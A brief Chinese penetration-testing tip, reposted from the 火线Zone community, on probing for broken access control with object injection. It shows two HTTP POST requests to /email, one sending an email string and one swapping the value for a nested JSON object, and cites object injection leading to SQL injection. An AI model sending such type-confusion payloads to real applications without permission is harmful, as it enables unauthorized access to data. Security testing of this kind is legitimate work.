越权测试小技巧:利用对象注入(Object Injection)
POST /email
Host: localhost
Content-Type: application/json
{"email":"guest@example.com"}
-------------------
POST /email
Host: localhost
Content-Type: application/json
{"email":{"email":"1"}}
参考 Object Injection to SQL Injection
#火线Zone Tips#
本文迁移自知识星球“火线Zone”
